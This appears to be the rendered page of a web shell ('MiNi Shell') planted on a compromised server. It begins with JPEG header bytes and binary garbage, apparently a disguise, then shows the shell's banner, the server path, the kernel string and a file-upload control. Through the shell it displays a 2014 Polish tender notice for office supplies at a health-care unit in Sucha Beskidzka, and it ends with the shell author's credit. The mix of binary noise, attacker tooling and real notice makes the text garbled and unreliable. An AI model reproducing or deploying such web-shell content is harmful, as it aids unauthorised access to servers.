JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140716/237488-N-2014.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa artykułów biurowych</b><br>
<b>Numer ogłoszenia: 237488 - 2014; data zamieszczenia: 16.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Blok makulaturowy A-4, 100 kartek	szt	50
Blok makulaturowy B -5, 100 kartek	szt	50
Blok rysunkowy A-4, 20 kartek	szt	10
Blok techniczny A-4, 10 kartek	szt	15
Brelok do kluczy	szt	150
Cienkopis czarny gr.linii 0,4mm,bezwonny,odporny na działanie światła,  tusz na bazie wody	szt	50
Cienkopis czerwony opis j.w.	szt	50
Cienkopis fioletowy opis j.w.	szt	10
Cienkopis niebieski opis j.w.	szt	20
Cienkopis pomarańczowy opis j.w.	szt	20
Cienkopis zielony opis j.w.	szt	40
Cienkopis żółty opis j.w.	szt	15
Datownik wysokość liter 4mm	szt	15
Długopisy czerwone jednorazowe	szt	140
Długopisy samoprzylepne na sprężynce	szt	5
Długopisy Zenith	szt	50
Długopisy zwykle typ Eagle 383 na wymianę wkładu (niebieskie, czarne)	szt	1000
Długopisy żelowe czarny	szt	90
Długopisy żelowe niebieski	szt	90
Druk Bankowy dowód wpłaty	szt	15
Druk Dziennik korespondencyjny A4 96 kartek sztywna oprawa	szt	30
Druk Ewidencja VAT nabycia format A5	szt	5
Druk Karty drogowe A 5, SM 101- samochód osobowy 100 stronicowy	bl	20
Druk Magazyn wyda	bl	40
Druk OT przyjęcie  środka trwałego	bl	10
Druk Polecenie księgowania A5 ofset	bl	20
Druk Polecenie księgowania A5 samokopiujące	szt	15
Druk Polecenie wyjazdu służbowego A5 druk delegacja	szt	10
Druk Raport kasowy A4 samokopiujący	bl	5
Druk RW wielopozycyjny samokopiujący 1 kopia 1/3 A 4	bl	80
Druk Wniosek o zaliczkę	bl	5
Druk Zamówienie A-4 samokopiujące z rubrykami	bl	30
Druk Zaświadczenie o zatrudnieniu i zarobkach	bl	15
Druk Zmiana miejsca użytkowania środka trwałego	bl	10
Dziurkacz średni dwuotworowy metalowy	szt	15
Dziurkacz typu NOVUS B265 do 65 kartek, 5lat gwarancji	szt	2
Etykiety samoprzylepne białe format A4 105*148,5 a 100 ark biała	op	5
Etykiety samoprzylepne białe format A4 74*105 a 100 ark biała	op	10
Folia aluminiowa a 20m	szt	210
Folia do drukarek laserowych A-4	szt	100
Folia do faxu  KX FA 52	szt	5
Folia do faxu  KX FA 57	szt	5
Folia do laminowania a 100szt A-4	op	10
Folia kolorowa 70* 110 samoprzylepna 	szt	10
Folia kolorowa 70* 110 samoprzylepna niebieska	szt	10
Grzbiety do bindowania 10mm a 100szt okrągłe	op	5
Grzbiety do bindowania 12,5 mm a 100szt okrągłe	op	4
Grzbiety do bindowania 19 mm a 100szt okrągłe	op	2
Grzbiety do bindowania 6mm a 100szt okrągłe	op	5
Grzbiety do bindowania 8 mm a 100szt okrągłe	op	3
Grzbiety wsuwane 10 mm	szt	20
Grzbiety wsuwane 12 mm	szt	10
Grzbiety wsuwane 15 mm	szt	30
Grzbiety wsuwane 6 mm	szt	30
Gumka do mazania	szt	20
Kieszonki na karty plastikowe z paskiem 	szt	300
Kalendarz książkowy A 4 1 dzień na 1 stronie	szt	20
Kalendarz plansza A 1	szt	50
Kalendarz stojący	szt	50
Kalendarze terminarz format A5 1 dzień na stronie	szt	40
Kalendarze terminarz format A5 3 dni na stronie	szt	5
Kalka maszynowa a 50szt	op	5
Kalka ołówkowa a 50szt	op	20
Karton A 4 kolor kremowy	szt	100
Karton archiwalny A4 szer. 9,5 cm klapa zamykająca trójkątna miejsce na nadruk	szt	1500
Klej biurowy w tubce - szkolny 50 ml do klejenia papieru i tektury	szt	150
Klej w sztyfcie 15 gr bezbarwny, bezwonny, nie toksyczny, nie brudzący 2 lata gwarancji	szt	230
Klips do identyfikatora	szt	300
Koperta 229*324*40 samoklejąca B 4 z rozszerzanymi bokami, spodem brązowa 	szt	20
Koperta pęcherzykowa biała 120*225 z folią bąbelkową samoklejące	szt	10
Koperta pęcherzykowa biała 180*265 z folią bąbelkową samoklejące	szt	20
Koperta pęcherzykowa biała 270*360 z folią bąbelkową samoklejące	szt	50
Koperty B - 5 białe a 500 szt nie klejone, wykonana z papieru o gramaturze 100g/m2	op	66
Koperty C - 4 białe a 250szt samoklejące	op	20
Koperty C - 5 białe a 500szt  samoklejące	op	10
Koperty C - 6 białe a 1000szt  samoklejące	op	13
Korektor pędzelek szybkoschnący w płynie 20 ml	szt	30
Korektor w taśmie 4,2*8,5 m	szt	450
Koszulki A - 3 z zawieszką a 10 szt pionowe	op	6
Koszulki z zawieszką A 4 a 100 szt	op	200
Koszulki z zawieszką A 5 a 100 szt	op	5
Linijka 30cm plastikowa przeźroczysta	szt	10
Litery samoprzylepne arkusz A4	szt	40
Litery samoprzylepne arkusz A5	szt	20
Magnetyczne punkty mocujące średnica 15 i 20 mm 	szt	150
Marker Pentel  z gąbką do tablic suchościeralnych 4 kolory	kpl	8
Mazaki 6 - cio kolorowe	kpl	10
Notes kostka 85x85	szt	5
Notes samoprzylepny 76x76, 100 kartkowy	szt	700
Nożyczki metalowe dł.  15 cm bez uchwytów plastikowych	szt	10
Nożyczki metalowe dł.  21 cm bez uchwytów plastikowych	szt	10
Okładka do bindowania przód a 100szt A-4 folia przeźroczysta	op	3
Okładka do bindowania tył a 100szt A-4 matowa lub błyszcząca, karton chromolux	op	3
Okładka na zeszyty A-4	szt	30
Okładka na zeszyty A-5	szt	20
Ołówek automatyczny 0,5 mm	szt	10
Ołówki	szt	50
Papier biurowy format A 3 a 500szt w ryzie, typu Polspeed 	op	120
Papier biurowy format A 4 a 500szt w ryzie, typu Polspeed 	op	3000
Papier kancelaryjny a 500szt	op	12
Papier komp. 240*1 	op	10
Papier komp. 240*2 z kopią kolorową	op	50
Papier komp. 240*3 z kopią kolorową	op	5
Papier komp. duży 360*1	op	3
Papier satynowany faktura marmurkowa 170g/m2 op. 25 ark (dyplom)	op	8
Papier śniadaniowy a 25ark	szt	50
Papier tablicowy - blok do flipchartu 70x100cm gładki 25 ark	szt	5
Papier xero kolorowy A 4 a 500szt kolory żywe	op	8
Pasek skoroszytowy	szt	400
Pinezki tablicowe 50szt w opak	op	15
Pinezki zwykłe	op	10
Pióro korektor	szt	50
Pisak luzem czarny	szt	10
Pisak luzem czerwony	szt	10
Pisak luzem niebieski	szt	10
Pisak Marker biały 1,5-3mm lakierowany	szt	5
Pisak Marker czarny 1,5-3mm  lakierowany	szt	5
Pisak Marker permanentny grubość 0,9 mm nie zawiera ksylenu do płyt CD czarny	szt	220
Pisak Marker pernamentny czarny 1,5-3mm 	szt	600
Pisak Marker pernamentny czerwony 1,5-3mm	szt	40
Pisak Marker pernamentny zielony 1,5-3mm	szt	5
Pisak Texmarker kolorowy	szt	80
Podkładka A 4 z klipem	szt	30
Przekładka  A-4  12 kolorów ,wzmocn. listwą Bantex,  karton 160gr/m2	kpl	10
Przekładka  A-4 wzmocn. listwą Bantex, alfabetyczna karton 160gr/m2	kpl	10
Przekładki do segregatora, kartonowe , kolorowe, do każdego segregatora	szt	50
Pudło zbiorcze Starr Office 53*30*34 na 6 segregatorów	szt	700
Rolka Fax 210*15	szt	100
Rolka Fax. 210*30	szt	12
Rolka termiczna 38*30m do kas fiskalnych	szt	100
Rolka termiczna 57 mm do kas fiskalnych	szt	300
Rozszywacz	szt	5
Segregatory A 5 szr.7 cm , kolorowe , lakierowane, pokryte laminowanym plastikiem z wymienną dwustronna etykietą, krawędzie okute na grzbiecie otwór na palec	szt	10
Segregatory szer 4 cm A 4, kolorowe , lakierowane , okute j.w.	szt	60
Segregatory szer 7 cm A 4, kolorowe , lakierowane,okute j.w	szt	300
Serwetki jedn. uż. 17x17 a 200szt	szt	150
Skoroszyt plast, z zawieszką przednia okładka przeźroczysta tylna kolorowa z mocnego sztywnego PCV twardy pasek, do podpisu	szt	600
Skoroszyt plastikowy bez zawieszki j.w.	szt	250
Skoroszyt z zawieszką tekturowy	szt	400
Skoroszyty tekturowe	szt	60
Skorowidz A-4, 100 kartkowy twarda oprawa	szt	10
Spinacz klips 19 mm	szt	100
Spinacz klips 25 mm	szt	100
Spinacz klips 51 mm	szt	50
Spinacze 28mm a 100szt okrągłe	op	700
Spinacze 50mm a 100szt okrągłe	op	30
Szpilki 50 gram	op	5
Szuflada na dokumenty przeźroczysta	szt	50
Taśma Dalton wąska 57mmx30m	szt	40
Taśma do metkownicy Halo II rzędowa	szt	80
Taśma do metkownicy kolorowa jednorzędowa	szt	15
Taśma do metkownicy meto biała I rzędowa 	szt	15
Taśma do metkownicy meto biała II rzędowa 	szt	15
Taśma klejąca szeroka 48mmx50m pakowa brązowa	szt	50
Taśma klejąca szerokość 2 cm	szt	100
Taśma montażowa 3m Scoth dwustronnie przylepna odporna na warunki klimatyczne super mocna 19mm*1,5 m na piance	szt	5
Taśma maszynowa 13mm	szt	5
Teczka biurowa tekturowa A 4 wiązana biała op. 50 szt.	szt	800
Teczka lakierowana na rzepę gr. 2 cm 	szt	30
Teczka plastikowa wiązana A 4 PCV przednia okładka przeźroczysta, tylna kolorowa 3 skrzydła wewnętrzne	szt	300
Teczka tekturowa z gumką A 4 biała	szt	100
Teczka z gumką A 4 kolorowe twarda oprawa 1 cm, kartonowa powlekana folią polipropylenową z tektury 450 gram lakierowane	szt	250
Teczka z gumką gr 2 cm, lakierowane j.w tektura 2 mm	szt	100
Teczka z gumką gr 3 cm, lakierowane j.w tektura 2 mm	szt	20
Teczka z gumką gr 6 cm j.w	szt	20
Temperówka wykonana ze stopu magnezu ze stalowym ostrzem typu KUM	szt	10
Tusz do stempli Noris czarny a 25ml	szt	10
Tusz do stempli Noris czerwony a 25 ml	szt	5
Tusz do stempli Noris fioletowy a 25ml	szt	3
Tusz do stempli Noris niebieski a 25ml	szt	80
Wkład do ołówka automatycznego 0,5 mm a 10 szt	op	10
Wkłady do Zenitów	szt	50
Zeszyty 32 kartkowe miękka oprawa A5	szt	20
Zeszyty 60 kartkowe miękka oprawa A5	szt	100
Zeszyty 80 kartkowe miękka oprawa A5	szt	80
Zeszyty 96 kartkowe twarda oprawa A5	szt	150
Zeszyty A - 4, 96 kartkowe twarda oprawa	szt	170
Zszywacz metalowy na 20 kartek zwykły	szt	40
Zszywki 23/10 na 70 kartek	op	25
Zszywki 23/13 na 100 kartek	op	10
Zszywki 23/8 na 50 kartek	op	25
Zszywki mini	op	5
Zszywki Rapid 66/8	op	5
Zszywki zwykłe rozm.24/6	op	800
CD RW do wielokrotnego zapisu w kopertach 700MB luzem 8-12x	szt	30
CD-R Platynium B45700Mb w kopertach 16*32*52 luzem pakowane	szt	23000
Płyty DVD R 4,7 - GB w plastikowym opakowaniu	szt	20
Płyty DVD R 4,7 + GB w plastikowym opakowaniu	szt	30
Płyty DVD RW 4,7 GB do wielokrotnego zapisu w plas.opakowaniu	szt	10.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.19.76.30-1, 44.17.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym przypadku zmianie ulegnie kwota podatku VAT i cena brutto, cena netto pozostanie niezmienna, 
c)	w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych, blok B, IV piętro w Zespole Opieki Zdrowotnej w Suchej Beskidzkiej ul. Szpitalna 22 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2014 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej, Administracja, blok C, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com